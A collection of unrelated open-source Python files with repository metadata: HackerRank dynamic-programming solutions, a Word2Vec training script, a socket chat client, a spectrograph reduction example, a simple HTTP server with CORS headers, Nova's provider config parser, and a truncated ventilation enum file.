|
[
"hendrik.frentrup@gmail.com"
] |
hendrik.frentrup@gmail.com
|
6e36e18ce750b34dc68b27706397187772e6fd8b
|
6c0329fedf2282344c8f8ec0dd3b135fb4c5e77c
|
/DynamicProgramming.py
|
06d6468dffff017b867953ab0284eef6db396e19
|
[] |
no_license
|
feiteng/hackerRank
|
451656e4326c6d7c6918f040e6c4bbb8a7a20d05
|
b1d2d2d5f9c1873dc1fb7bcfae043e7484146a82
|
refs/heads/master
| 2021-01-20T09:55:17.488942
| 2017-05-23T14:19:54
| 2017-05-23T14:19:54
| 90,303,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,114
|
py
|
def The_Coin_Change_Problem():
n, m = map(int, input().split())
coins = list(map(int, input().split()))
ways = [0] * (n + 1)
ways[0] = 1
for i in range(len(coins)):
for j in range(coins[i], n + 1):
ways[j] += ways[j - coins[i]]
print(ways[n])
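# e.g. n=4, coins=[1, 2, 3]: ways evolves [1,1,1,1,1] -> [1,1,2,2,3] -> [1,1,2,3,4],
# so there are 4 ways to make 4 (1+1+1+1, 1+1+2, 2+2, 1+3)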
def Equal():
for _ in range(int(input())):
q = input()
n = list(map(int, input().split()))
minval = min(n)
minvals = [i - minval for i in n]
count = sum(op(m) for m in minvals)
# print(count)
for i in [1, 1, 3]:
minvals = [m + i for m in minvals]
nextcount = sum(op(m) for m in minvals)
count = min(count, nextcount)
print(count)
def op(n):
coins = [1, 2, 5]
count = 0
count += n // 5
n %= 5
count += n // 2
n %= 2
count += n
return count
def Fibonacci_Modified():
a0, a1, n = map(int, input().split())
for i in range(n - 2):
a2 = a0 + a1 ** 2
a0 = a1
a1 = a2
print(a2)
def Sherlock_and_Cost():
for _ in range(int(input())):
n = int(input())
b = list(map(int, input().split()))
if (n < 2):
print(0)
continue
p = [0]
np = [0]
for i in range(1, n):
p.append(max(b[i] - 1 + np[i - 1], p[i - 1]))
np.append(max(p[i - 1] + b[i - 1] - 1, np[i - 1]))
print(max(p[-1], np[-1]))
def Vertical_Sticks():
for _ in range(int(input())):
n = int(input())
c = list(map(int, input().split()))
v = []
for i in c:
v.append(sum([1 if i <= j else 0 for j in c]))
count = 0
for i in v:
count += (n + 1) / (i + 1)
print('{0:.2f}'.format(count))
def Candies():
candyCount = []
for _ in range(int(input())):
candyCount.append((int(input())))
ratings = [1 for _ in range(len(candyCount))]
print(candy(candyCount))
def candy(ratings):
"""
:type ratings: List[int]
:rtype: int
"""
candies = [1 for _ in range(len(ratings))]
for i in range(len(candies) - 1):
if ratings[i] < ratings[i + 1]:
candies[i + 1] = candies[i] + 1
for i in range(len(candies) - 1, 0, -1):
if ratings[i] < ratings[i - 1]:
candies[i - 1] = max(candies[i - 1], candies[i] + 1)
# print(candies)
return sum(candies)
def Sam_and_substrings():
s = input()
count = 0
factor = 1
k = 1
for i in range(len(s) - 1, -1, -1):
n = int(s[i])
count += n * (i + 1) * factor % 1000000007
factor = (factor * 10 + 1) % 1000000007
print(count % 1000000007)
def Abbreviation():
import collections
for _ in range(int(input())):
a = input()
b = input()
aCap = [ai for ai in a if ai < 'a']
fal = False
c1 = collections.Counter(aCap)
c2 = collections.Counter(b)
for c in c1.keys():
if c not in c2 or c1[c] > c2[c]:
fal = True
# for c in c2.keys():
# if c not in c1 or c2[c] > c1[c]:
# fal = True
a = a.upper()
if fal:
print("NO")
else:
lcslen = AbbreviationLCS(b, a, len(b) - 1, len(a) - 1)
if lcslen == len(b):
print("YES")
else:
print("NO")
def AbbreviationLCS(a, b, i, j):
lcs = [[0 for x in range(j + 1)] for y in range(i + 1)]
run = 0
while i >= 0 and j >= 0:
if a[i] == b[j]:
run += 1
lcs[i][j] += run
i -= 1
j -= 1
else:
j -= 1
return run
# if i < 0 or j < 0: return 0
# if a[i] == b[j]: return 1 + AbbreviationLCS(a, b, i - 1, j - 1)
# return AbbreviationLCS(a, b, i - 1, j)
def The_Longest_Common_Subsequence():
n, m = map(int, input().split())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
import time
t = time.time()
Abbreviation()
# AbbreviationLCS([],[],5,3)
print(time.time() - t)
|
[
"fl750@nyu.edu"
] |
fl750@nyu.edu
|
13c876bb6562c6106b1ba1a869f2d9b0c82c55ff
|
5963bdd035ced26df0fac99bf03368c6f6ac8da7
|
/AntitrustLNAnalysis/Word2Vec.py
|
94986de25f8d0c4cb4b275cf6e8dca91b2af48e5
|
[] |
no_license
|
javant4/Special-Projects
|
bd38f6b2d27f168e24c19e89ec35f005dd6d0d54
|
04a6db29aca6c9c9f13d8d5cd65c9ea83047fabf
|
refs/heads/master
| 2022-12-06T19:56:03.076516
| 2018-09-23T19:04:04
| 2018-09-23T19:04:04
| 150,013,152
| 0
| 1
| null | 2022-11-28T00:54:31
| 2018-09-23T18:28:08
|
Python
|
UTF-8
|
Python
| false
| false
| 3,836
|
py
|
import gensim
from docx import Document
import os
from gensim.models import Word2Vec
import logging
import re
from nltk.corpus import stopwords
from nltk import word_tokenize
import nltk.data
# nltk.download('punkt')
tokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')
def read_docs(file):
data = Document(file)
raw_text = ''
for p in data.paragraphs:
raw_text += p.text + ' '
return raw_text
# f = open("path/to/text/file", "r+", encoding = 'utf8')
# q = f.read()
def pre_processing(case):
text = []
path = os.path.join(os.getcwd(), 'data', case)
stop_words = set(stopwords.words('english')) # language can change
for idx, file in enumerate(os.listdir(path)):
if file.endswith('docx'):
word_tok = word_tokenize(read_docs(os.path.join(path,file))) # splits the text into a list of words
remove_stopwords = [w for w in word_tok if not w in stop_words]
sent = ' '.join(remove_stopwords) # joins the lists of words back into a string
text.append(sent)
return text
# res = pre_processing('afc')
# for doc in res:
# print(doc)
# break
# print(len(sent)) #Confirms that you have filtered words
# print(len(q))
def sentence_to_wordlist(sentences, remove_stopwords=False):
    # 1. Remove punctuation
    sentence_text = re.sub(r'[^\w\s]', '', sentences)  # strips everything except word characters and whitespace
# 2. Convert words to lower case and split them
words = sentence_text.lower().split()
# 3. Return a list of words
return words
def split_by_sentences(tokenizer, remove_stopwords=False):
    sentences = []
    for doc in pre_processing('fr'):
        try:
            # 1. Use the NLTK tokenizer to split the text into sentences
            raw_sentences = tokenizer.tokenize(doc.strip())
            # 2. Loop over each sentence
            for raw_sentence in raw_sentences:
                # If a sentence is empty, skip it; otherwise, call
                # sentence_to_wordlist to get a list of words
                if len(raw_sentence) > 0:
                    sentences.append(sentence_to_wordlist(raw_sentence))
        except Exception:
            print('skipping a document that could not be tokenized')
    # 3. Return the list of sentences (each sentence is a list of words,
    # so this returns a list of lists)
    return sentences
sent_list = split_by_sentences(tokenizer)
# # These are parameters that can be tweaked to accommodate the corpus
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
num_features = 100    # Word vector dimensionality
min_word_count = 1    # Minimum word count (i.e. only keep words that appear at least this many times)
num_workers = 4 # Number of threads to run in parallel
context = 20 # Context window size (ie. how many words surrounding the target word will count towards)
downsampling = 1e-3
model = gensim.models.Word2Vec(sent_list, workers=num_workers, size=num_features, min_count = min_word_count, window = context, sample = downsampling)
model.save('fr_model_w20') #save the model for future use or analysis
# #load model
# # model = Word2Vec.load('model name')
# print(model) #to see model vocab size
# print(model.wv.vocab) #display model vocab
# model.most_similar(positive='', topn=30) #view the words that have the highest correlation to the target word
# model.most_similar(positive='', negative='') #view words that are related to the (positive) but not related to the (negative)
#For (positive) and (negative) string args can be lists as well
# Ex: model.most_similar(positive=['',''], topn=30)
# Ex: model.most_similar(positive=['',''], negative=['','',''])
### Other examples of post model analysis functions
### https://radimrehurek.com/gensim/models/word2vec.html
|
[
"31806937+javant4@users.noreply.github.com"
] |
31806937+javant4@users.noreply.github.com
|
03c4bf7b090b48115675d7782ebce880b5b8cb68
|
e8858907c61aea7ec6b80390745e7c8864c13b75
|
/src/game/tests/deck-tester.py
|
b77725c09c8d5cdc205961986568c9f134c65ea6
|
[] |
no_license
|
The2b/AI-Poker-Project
|
431294f66f2cbb7f6974c3e6888aaf84ff0834ca
|
b23798c6a34661434ca56a01baa94fdb07d82422
|
refs/heads/master
| 2021-04-29T23:09:06.716014
| 2018-04-20T00:53:35
| 2018-04-20T01:33:31
| 121,548,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
from Deck import Deck
import copy
ourDeck = Deck(None, None)
CardsDelt = copy.deepcopy(ourDeck.dealCards(10))
for Card in CardsDelt:
    print(type(Card))
|
[
"thomas.lenz96@gmail.com"
] |
thomas.lenz96@gmail.com
|
d27b3f107bc594ca0d864e1df5839555b1d76a77
|
5081a7f9d2bb521fa7ab6738d2c766b40daa2957
|
/cl.py
|
f68db42f854dcf6aebefeacd7bf412fbfee14272
|
[] |
no_license
|
robinthomas-hmh/chatserv
|
5dab41359a479443205cd71734f8929aea61ecb5
|
11f6bf0e57399327031d7e632c9230b4bce75386
|
refs/heads/master
| 2022-05-22T20:45:23.896403
| 2022-05-09T10:50:39
| 2022-05-09T10:50:39
| 140,443,902
| 0
| 0
| null | 2022-05-09T10:50:40
| 2018-07-10T14:24:20
|
Python
|
UTF-8
|
Python
| false
| false
| 3,092
|
py
|
import socket
import sys
import threading
from threading import Thread
from socketserver import ThreadingMixIn
class server_thread(Thread):
    def run(self):
        global flag  # shared shutdown flag, also read by server_reply
        self.cl_socket.send(self.hello_msg.encode())
        srv_helo_rep = self.cl_socket.recv(2048).decode()
print("\n",srv_helo_rep)
#msg_test = input("Please enter join msg")
msg_to_join = "JOIN_CHATROOM: "+self.cl_chatroom+"\nCLIENT_IP: "+str(self.cl_client_ip)+"\nPORT: "+str(self.cl_client_port)+"\nCLIENT_NAME: "+self.cl_client_name+"\n"
self.cl_socket.send(msg_to_join.encode())
while True:
message_server = self.cl_socket.recv(2048).decode()
if "DISCONNECT" in message_server:
print(message_server)
flag=1
self.cl_socket.close()
sys.exit()
else:
if len(message_server)>0:
print(message_server)
sys.stdout.write("Type a Message: ")
sys.stdout.flush()
message_client = sys.stdin.readline()
self.cl_socket.send(message_client.encode())
def __init__(self,cl_socket,cl_client_ip,cl_client_port,cl_chatroom,cl_client_name,hello_msg):
Thread.__init__(self)
self.cl_socket = cl_socket
self.cl_client_ip = cl_client_ip
self.cl_client_port = cl_client_port
self.cl_chatroom = cl_chatroom
self.cl_client_name = cl_client_name
self.hello_msg = hello_msg
class server_reply(Thread):
def __init__(self,c_socket):
Thread.__init__(self)
self.c_socket = c_socket
def run(self):
client_socket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket2.connect((IP_address, Port2))
#print("test: inside thread reply")
while True:
if flag==0:
msg_from_server=client_socket2.recv(1024).decode()
print(msg_from_server)
if flag == 1:
client_socket2.close()
sys.exit()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) != 3:
print("Enter IP address and port number")
exit()
chatroom = input("Enter the name of the chatroom: ")
client_ip = 0
client_port = 0
client_name = input("Please enter the name of the client : ")
IP_address = str(sys.argv[1])
Port = int(sys.argv[2])
client_socket.connect((IP_address, Port))
Port2 = 5050
flag=0
threads = []
helo_msg = input("Enter helo:")
try:
clientThread = server_thread(client_socket,client_ip,client_port,chatroom,client_name,helo_msg)
clientThread.daemon = True
clientThread.start()
clientThread2 = server_reply(client_socket)
clientThread2.daemon = True
#clientThread2.start()
threads.append(clientThread)
#threads.append(clientThread2)
while True:
for t in threads:
t.join(600)
            if not t.is_alive():
break
break
except KeyboardInterrupt:
client_socket.send("Bye".encode())
sys.exit()
|
[
"robin70001@gmail.com"
] |
robin70001@gmail.com
|
4ba047ffbc19e84d25aa4a3cdda4854bf5776538
|
8ba794154ff3cd3d9c743c37de354fb71cfb5b12
|
/pyhydra/example_geha.py
|
5edad6290f86afb5200092f3e7eec4e8fa79820d
|
[] |
no_license
|
npadmana/py_hydra
|
76bbcc1024aefa3d6adac1ee6e615c761f080879
|
6f4c29a3b35de16a980f4ad390db3e1245f86d41
|
refs/heads/master
| 2020-12-24T13:53:01.539515
| 2011-10-22T03:01:14
| 2011-10-22T03:01:14
| 2,464,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,815
|
py
|
import pyhydra
from ROOTpy import *
datadir='../rawdata/jul2010/'
cc = pyhydra.HydraRun('test', imfix=pyhydra.utils.transpImage)
# Read in biases
dt = dtype([('x', 'S21'), ('y', 'f8')])
flist1 = loadtxt(datadir+'bias.plan', dtype=dt)
flist = [datadir + ff for ff in flist1['x']]
cc.set_bias(flist)
# Read in 2d flats
dt = dtype([('x', 'S21'), ('y', 'f8')])
flist1 = loadtxt(datadir+'flats.plan', dtype=dt)
flist = [datadir + ff for ff in flist1['x']]
cc.set_flat2d(flist)
# Generate traces
# The defaults have been tuned for this
cc.generate_traces()
# Trace out the flats
cc.trace_flat1d()
# Load in the arc solutions
flist1 = loadtxt(datadir+'allarc.plan', dtype=dt)
ww = flist1['y'] == 20.0
flist = [datadir + ff['x'] for ff in flist1[ww]]
cc.set_masterarc(flist, mintrace=20, maxtrace=60)
cc.find_masterarc_lines(lo=-20.0)
plt.clf()
cc.plot_masterarc_lines(rcut=None)
plt.savefig('geha_masterarc_all_lines.png')
plt.clf()
cc.plot_masterarc_lines(rcut=-100.0)
plt.savefig('geha_masterarc_rcut100_lines.png')
# Now generate the wavelength solution
arclines = pyhydra.arclines('CuAr', minwave=3000.0, maxwave=9000.0)
startwave = 7500.0 # What is your starting wavelength, guess here
disp = -1.5 # What is your starting dispersion in Ang/pixel, guess here
guess_quality = 0.8 # How good is your guess -- the worse this number is, the longer this will take
rcut = -100.0 # Set some line quality
sigrej= 5.0 # Throw out lines who are sigrej*MAD from zero. This is necessary for robustness
cc.get_wavesol(arclines, rcut, startwave, disp, guess_quality=guess_quality, sigrej=sigrej, niter=[20,10,5])
# Plot it
plt.clf()
cc.plot_wavesol(resid=False)
plt.savefig('geha_wavesol.png')
plt.clf()
cc.plot_wavesol(resid=True)
plt.savefig('geha_wavesol_resid.png')
cc.save('test1')
vv = cc.plot_traces()
|
[
"nikhil.padmanabhan@yale.edu"
] |
nikhil.padmanabhan@yale.edu
|
a473db825c8f4b512a6a16381a8d9197e23babf5
|
ed389764d8bea84b897c964d8ea25e025fe03d1b
|
/cat_age_whit_setter_getter.py
|
b4f830f3cb0529e803c65162d26f653b10e3b940
|
[] |
no_license
|
hyunsoo5656/lecture_4
|
982b1428f0960652a2f8d199dbf4d866200efbd4
|
fc266d1eaf16ee8ebd1924bfe8e1e1bf8aa4c28f
|
refs/heads/master
| 2022-11-16T05:41:31.875745
| 2020-07-17T01:38:05
| 2020-07-17T01:38:05
| 280,104,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
class Cat:
def __init__(self, name, age):
self.__name = name
self.__age = age
def __str__(self):
return 'Cat(name='+self.__name+', age='+str(self.__age)+')'
def set_age(self, age):
if age > 0:
self.__age = age
def get_age(self):
return self.__age
nabi = Cat('나비', 3)
print(nabi)
nabi.set_age(4)
nabi.set_age(-5)
print(nabi)
|
[
"hyunsoo5656@gmail.com"
] |
hyunsoo5656@gmail.com
|
a6106c574914e391aa1fd34dc75b81e990069d4f
|
f6fb09607e3351e8a8a808cc6edccb3cbef6a5f2
|
/script/server.py
|
e9036f737c3e79ef1cffb49b9a9022cfb90a360f
|
[
"Apache-2.0"
] |
permissive
|
matseng/googleads-ima-html5
|
b91a32d72b822c55fabfe81815d3d2fc1a42c1af
|
a9c7547b5db0d29026b294b6ff62c920da4812f5
|
refs/heads/master
| 2020-12-03T08:00:16.021545
| 2014-10-15T23:29:41
| 2014-10-15T23:29:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
#!/usr/bin/env python
import SimpleHTTPServer
class MyHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_my_headers()
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def send_my_headers(self):
# self.send_header("Access-Control-Allow-Origin", "*")
self('Access-Control-Allow-Origin', 'http://imasdk.googleapis.com');
# self('Access-Control-Allow-Credentials', 'false');
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
if __name__ == '__main__':
SimpleHTTPServer.test(HandlerClass=MyHTTPRequestHandler)
|
[
"mtseng@vindicogroup.com"
] |
mtseng@vindicogroup.com
|
38dce5d0f37915cb797c47057437081038b569ef
|
4a97fa694f2e39644b930d9bd0fe03736e1b983d
|
/Button.py
|
e95e668d08d0a5a7075ddaf1e8eba757c65706ed
|
[] |
no_license
|
MehrdadJannesar/Tkinter
|
c6b2328f260542a5da9c197cfe61d588c91b34ec
|
08ecd97b77c23c25fa8a22fd94df122a3812e3f1
|
refs/heads/master
| 2022-11-28T20:39:58.417258
| 2020-07-23T10:56:08
| 2020-07-23T10:56:08
| 281,925,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
# Button(master , option = value , ....)
# master --> This represents the parent window
# Option and Description
# activebackground --> Background color when the button is under the cursor
# activeforeground --> Foreground color when the button is under the cursor
# bg --> Normal background color
# bd --> Border width in pixels. Default == 2
# fg --> Normal Foreground (Text) color
# command --> Function or method to be called when the button is click
# font --> Text font to be used for the button's label
# height --> Height of the Button
# width --> Width of the button
# image --> image to be displayed on the Button
# justify --> Left or Right or Center --> How to show multiple text lines
# padx --> additional padding left and right of the text
# pady --> additional padding above and below of the text
# relief --> SUNKEN, RAISED, GROOVE, RIDGE
# state --> DISABLED, NORMAL, ACTIVE
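# e.g. a button combining several of the options above (some_callback stands
# in for any function you define):
# Button(top, text="OK", bg="white", fg="black", padx=10, pady=5,
#        relief=RAISED, justify=CENTER, command=some_callback)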
from tkinter import *
from tkinter import messagebox
top = Tk()
top.geometry("100x100")
def helloCallBack():
msg = messagebox.showinfo("info", "Hello tkinter!")
b = Button(top, text = "Test", command = helloCallBack, state = "disabled")
b.pack()
top.mainloop()
|
[
"jannesar.computer@yahoo.com"
] |
jannesar.computer@yahoo.com
|
5103174fd247efef0e902eccf04cb6c5e6dfb91d
|
6ff7ab13f7f4b0d699fa178a7d742c0253a6eddd
|
/nova/compute/provider_config.py
|
7860deb5e1c599576b2d5414b1386443feda9dc5
|
[
"Apache-2.0"
] |
permissive
|
keonjeo/nova
|
85402845d84c2c9c97e3514cd7d41fcccaca8ca6
|
197dac3c78a458302ccbda00b992879b2b2ffef1
|
refs/heads/master
| 2022-12-06T14:01:46.751686
| 2020-08-26T21:03:44
| 2020-08-26T21:03:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,342
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import jsonschema
import logging
import microversion_parse
import os
import yaml
import os_resource_classes
import os_traits
from nova import exception as nova_exc
from nova.i18n import _
LOG = logging.getLogger(__name__)
# A dictionary with keys for all supported major versions with lists of
# corresponding minor versions as values.
SUPPORTED_SCHEMA_VERSIONS = {
1: {0}
}
# Supported provider config file schema
SCHEMA_V1 = {
    # This definition uses JSON Schema Draft 7.
# https://json-schema.org/draft-07/json-schema-release-notes.html
'type': 'object',
'properties': {
# This property is used to track where the provider.yaml file
# originated. It is reserved for internal use and should never be
# set in a provider.yaml file supplied by an end user.
'__source_file': {'not': {}},
'meta': {
'type': 'object',
'properties': {
# Version ($Major, $minor) of the schema must successfully
# parse documents conforming to ($Major, 0..N).
# Any breaking schema change (e.g. removing fields, adding
# new required fields, imposing a stricter pattern on a value,
# etc.) must bump $Major.
'schema_version': {
'type': 'string',
'pattern': '^1.([0-9]|[1-9][0-9]+)$'
}
},
'required': ['schema_version'],
'additionalProperties': True
},
'providers': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'identification': {
'$ref': '#/$defs/providerIdentification'
},
'inventories': {
'$ref': '#/$defs/providerInventories'
},
'traits': {
'$ref': '#/$defs/providerTraits'
}
},
'required': ['identification'],
'additionalProperties': True
}
}
},
'required': ['meta'],
'additionalProperties': True,
'$defs': {
'providerIdentification': {
# Identify a single provider to configure.
# Exactly one identification method should be used. Currently
# `uuid` or `name` are supported, but future versions may
# support others. The uuid can be set to the sentinel value
# `$COMPUTE_NODE` which will cause the consuming compute service to
# apply the configuration to all compute node root providers
# it manages that are not otherwise specified using a uuid or name.
'type': 'object',
'properties': {
'uuid': {
'oneOf': [
{
# TODO(sean-k-mooney): replace this with type uuid
# when we can depend on a version of the jsonschema
# lib that implements draft 8 or later of the
# jsonschema spec.
'type': 'string',
'pattern':
'^[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{12}$'
},
{
'type': 'string',
'const': '$COMPUTE_NODE'
}
]
},
'name': {
'type': 'string',
'minLength': 1,
'maxLength': 200
}
},
# This introduces the possibility of an unsupported key name being
# used to get by schema validation, but is necessary to support
# forward compatibility with new identification methods.
# This should be checked after schema validation.
'minProperties': 1,
'maxProperties': 1,
'additionalProperties': False
},
'providerInventories': {
# Allows the admin to specify various adjectives to create and
# manage providers' inventories. This list of adjectives can be
# extended in the future as the schema evolves to meet new use
# cases. As of v1.0, only one adjective, `additional`, is
# supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
'patternProperties': {
                            # Allows any key name matching the resource class
                            # pattern; a check to prevent conflicts with virt
                            # driver owned resource classes will be done after
                            # schema validation.
'^[A-Z0-9_]{1,255}$': {
'type': 'object',
'properties': {
# Any optional properties not populated
# will be given a default value by
# placement. If overriding a pre-existing
# provider values will not be preserved
# from the existing inventory.
'total': {
'type': 'integer'
},
'reserved': {
'type': 'integer'
},
'min_unit': {
'type': 'integer'
},
'max_unit': {
'type': 'integer'
},
'step_size': {
'type': 'integer'
},
'allocation_ratio': {
'type': 'number'
}
},
'required': ['total'],
# The defined properties reflect the current
# placement data model. While defining those
# in the schema and not allowing additional
# properties means we will need to bump the
# schema version if they change, that is likely
# to be part of a large change that may have
# other impacts anyway. The benefit of stricter
# validation of property names outweighs the
# (small) chance of having to bump the schema
# version as described above.
'additionalProperties': False
}
},
# This ensures only keys matching the pattern
# above are allowed.
'additionalProperties': False
}
}
},
'additionalProperties': True
},
'providerTraits': {
# Allows the admin to specify various adjectives to create and
# manage providers' traits. This list of adjectives can be extended
# in the future as the schema evolves to meet new use cases.
# As of v1.0, only one adjective, `additional`, is supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
# Allows any value matching the trait pattern here,
# additional validation will be done after schema
# validation.
'type': 'string',
'pattern': '^[A-Z0-9_]{1,255}$'
}
}
},
'additionalProperties': True
}
}
}
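# An example provider.yaml that conforms to SCHEMA_V1 (illustrative sketch;
# the resource class and trait names below are made up, and the validation
# stage additionally requires both to be custom, i.e. CUSTOM_-prefixed):
#
#   meta:
#     schema_version: '1.0'
#   providers:
#     - identification:
#         uuid: $COMPUTE_NODE
#       inventories:
#         additional:
#           - CUSTOM_EXAMPLE_RC:
#               total: 100
#               reserved: 0
#       traits:
#         additional:
#           - CUSTOM_EXAMPLE_TRAIT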
def _load_yaml_file(path):
"""Loads and parses a provider.yaml config file into a dict.
:param path: Path to the yaml file to load.
:return: Dict representing the yaml file requested.
:raise: ProviderConfigException if the path provided cannot be read
or the file is not valid yaml.
"""
try:
with open(path) as open_file:
try:
return yaml.safe_load(open_file)
except yaml.YAMLError as ex:
message = _("Unable to load yaml file: %s ") % ex
if hasattr(ex, 'problem_mark'):
pos = ex.problem_mark
message += _("File: %s ") % open_file.name
message += _("Error position: (%s:%s)") % (
pos.line + 1, pos.column + 1)
raise nova_exc.ProviderConfigException(error=message)
except OSError:
message = _("Unable to read yaml config file: %s") % path
raise nova_exc.ProviderConfigException(error=message)
def _validate_provider_config(config, provider_config_path):
"""Accepts a schema-verified provider config in the form of a dict and
performs additional checks for format and required keys.
:param config: Dict containing a provider config file
:param provider_config_path: Path to the provider config, used for logging
:return: List of valid providers
:raise nova.exception.ProviderConfigException: If provider id is missing,
or a resource class or trait name is invalid.
"""
def _validate_traits(provider):
# Check that traits are custom
additional_traits = set(provider.get("traits", {}).get(
"additional", []))
trait_conflicts = [trait for trait in additional_traits
if not os_traits.is_custom(trait)]
if trait_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid traits, only custom traits are allowed: %s"
) % sorted(trait_conflicts)
raise nova_exc.ProviderConfigException(error=message)
return additional_traits
def _validate_rc(provider):
# Check that resource classes are custom
additional_inventories = provider.get("inventories", {}).get(
"additional", [])
all_inventory_conflicts = []
for inventory in additional_inventories:
inventory_conflicts = [rc for rc in inventory
if not os_resource_classes.is_custom(rc)]
if inventory_conflicts:
all_inventory_conflicts += inventory_conflicts
if all_inventory_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid resource class, only custom resource classes "
"are allowed: %s") % ', '.join(sorted(all_inventory_conflicts))
raise nova_exc.ProviderConfigException(error=message)
return additional_inventories
# store valid providers
valid_providers = []
for provider in config.get("providers", []):
# Check that the identification method is known since
# the schema only requires that some property be present
pid = provider["identification"]
provider_id = pid.get("name") or pid.get("uuid")
# Not checking the validity of provider_id since
# the schema has already ensured that.
additional_traits = _validate_traits(provider)
additional_inventories = _validate_rc(provider)
# filter out no-op providers so they will not be returned
if not additional_traits and not additional_inventories:
message = (
"Provider %(provider_id)s defined in %(provider_config_path)s "
"has no additional inventories or traits and will be ignored."
) % {
"provider_id": provider_id,
"provider_config_path": provider_config_path
}
LOG.warning(message)
else:
valid_providers.append(provider)
return valid_providers
def _parse_provider_yaml(path):
"""Loads schema, parses a provider.yaml file and validates the content.
:param path: File system path to the file to parse.
:return: dict representing the contents of the file.
:raise ProviderConfigException: If the specified file does
not validate against the schema, the schema version is not supported,
or if unable to read configuration or schema files.
"""
yaml_file = _load_yaml_file(path)
try:
schema_version = microversion_parse.parse_version_string(
yaml_file['meta']['schema_version'])
except (KeyError, TypeError):
message = _("Unable to detect schema version: %s") % yaml_file
raise nova_exc.ProviderConfigException(error=message)
if schema_version.major not in SUPPORTED_SCHEMA_VERSIONS:
message = _(
"Unsupported schema major version: %d") % schema_version.major
raise nova_exc.ProviderConfigException(error=message)
if schema_version.minor not in \
SUPPORTED_SCHEMA_VERSIONS[schema_version.major]:
# TODO(sean-k-mooney): We should try to provide a better
# message that identifies which fields may be ignored
# and the max minor version supported by this version of nova.
message = (
"Provider config file [%(path)s] is at schema version "
"%(schema_version)s. Nova supports the major version, "
"but not the minor. Some fields may be ignored."
% {"path": path, "schema_version": schema_version})
LOG.warning(message)
try:
jsonschema.validate(yaml_file, SCHEMA_V1)
except jsonschema.exceptions.ValidationError as e:
message = _(
"The provider config file %(path)s did not pass validation "
"for schema version %(schema_version)s: %(reason)s") % {
"path": path, "schema_version": schema_version, "reason": e}
raise nova_exc.ProviderConfigException(error=message)
return yaml_file
def get_provider_configs(provider_config_dir):
"""Gathers files in the provided path and calls the parser for each file
and merges them into a list while checking for a number of possible
conflicts.
:param provider_config_dir: Path to a directory containing provider config
files to be loaded.
:raise nova.exception.ProviderConfigException: If unable to read provider
config directory or if one of a number of validation checks fail:
- Unknown, unsupported, or missing schema major version.
- Unknown, unsupported, or missing resource provider identification.
- A specific resource provider is identified twice with the same
method. If the same provider identified by *different* methods,
such conflict will be detected in a later stage.
- A resource class or trait name is invalid or not custom.
- A general schema validation error occurs (required fields,
types, etc).
    :return: A dict of dicts keyed by uuid_or_name with the parsed and
        validated contents of all files in the provided dir. Each value in
        the dict will include the source file name as the value of the
        __source_file key.
"""
provider_configs = {}
provider_config_paths = glob.glob(
os.path.join(provider_config_dir, "*.yaml"))
provider_config_paths.sort()
if not provider_config_paths:
message = (
"No provider configs found in %s. If files are present, "
"ensure the Nova process has access."
)
LOG.info(message, provider_config_dir)
# return an empty dict as no provider configs found
return provider_configs
for provider_config_path in provider_config_paths:
provider_config = _parse_provider_yaml(provider_config_path)
for provider in _validate_provider_config(
provider_config, provider_config_path,
):
provider['__source_file'] = os.path.basename(provider_config_path)
pid = provider["identification"]
uuid_or_name = pid.get("uuid") or pid.get("name")
# raise exception if this provider was already processed
if uuid_or_name in provider_configs:
raise nova_exc.ProviderConfigException(
error=_(
"Provider %(provider_id)s has multiple definitions "
"in source file(s): %(source_files)s."
) % {
"provider_id": uuid_or_name,
# sorted set for deduplication and consistent order
"source_files": sorted({
provider_configs[uuid_or_name]["__source_file"],
provider_config_path
})
}
)
provider_configs[uuid_or_name] = provider
return provider_configs
|
[
"tao.su@intel.com"
] |
tao.su@intel.com
|
19d241f9c34e3cf73458f8cc54ad837d658b6827
|
0330a4bc717c9c422511c9a13e4a9e9090fdcf36
|
/service/Ideo/Ideo.py
|
2a3da2cd644f20bf23277b88d0897cfb0d4aa3ba
|
[] |
no_license
|
gstrub/rf2mqtt
|
cf99f4f4a72231f94f97d53a5ddb2039663493a7
|
c967b1ac581037c69165d4a29ac19eb9917d3d13
|
refs/heads/main
| 2023-02-16T05:36:20.491451
| 2021-01-13T13:51:37
| 2021-01-13T13:51:37
| 329,276,716
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,673
|
py
|
from enum import Enum
class AirflowState(Enum):
Low = 1
High = 0
Away = 2
class BypassState(Enum):
Off = 0
On = 8
Forced = 9
class Schedule(Enum):
